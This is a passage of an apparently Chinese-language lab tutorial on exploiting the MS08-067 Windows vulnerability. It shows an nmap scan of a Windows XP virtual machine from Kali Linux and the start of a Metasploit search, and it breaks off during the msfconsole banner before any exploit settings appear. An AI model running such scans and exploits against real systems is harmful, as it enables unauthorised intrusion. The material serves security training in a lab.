ms08-067漏洞利用
实验环境
1.kali linux(ip:192.168.131.131)
2.windows xp (ip:192.168.131.134)
端口检测
nmap 192.168.131.134
root@kali:~# nmap 192.168.131.134
Starting Nmap 7.70 ( https://nmap.org ) at 2020-09-10 14:17 CST
Nmap scan report for 192.168.131.134
Host is up (0.00010s latency).
Not shown: 995 closed ports
PORT STATE SERVICE
23/tcp open telnet
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
MAC Address: 00:0C:29:B1:96:23 (VMware)
Nmap done: 1 IP address (1 host up) scanned in 3.06 seconds
发现445和3389等高危端口都是开放状态;
漏洞利用
1.打开msf工具搜索ms08-067;(search 08-067)
[i] Database already started
[i] The database appears to be already configured, skipping initialization
.:okOOOkdc' 'cdkOOOko:.
.xOOOOOOOOOOOOc cOOOOOOOOOOOOx.
:OOOOOOOOOOOOOOOk, ,kOOOOOOOOOOOOOOO:
'OOOOOOOOOkkkkOOOOO: :OOOOOOOOOOOOOOOOOO'
oOOOOOOOO.MMMM.oOOOOoOOOOl.MMMM,OOOOOOOOo
dOOOOOOOO.MMMMMM.cOOOOOc.MMMMMM,OOOOOOOOx
lOOOOOOOO.MMMMMMMMM;d;MMMMMMMMM,OOOOOOOOl
.OOOOOOOO.MMM.;MMMMMMMMMMM;MMMM,OOOOOOOO.
cOOOOOOO.MMM.OOc.MMMMM'oOO.MMM,OOOOOOOc
oOOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOOo
lOOOOO.MMM.OOOO.MMM:OOOO.MMM,OOOOOl
;OOOO'MMM.OOOO.MMM:OOOO.MMM;OOOO;
.dOOo'WM.OOOOocccxOOOO.MX'xOOd.
,kOl'M.OOOOOOOOOOOOO.M'dOk,
:kk;.OOOOOOOOOOOOO.;Ok:
;kO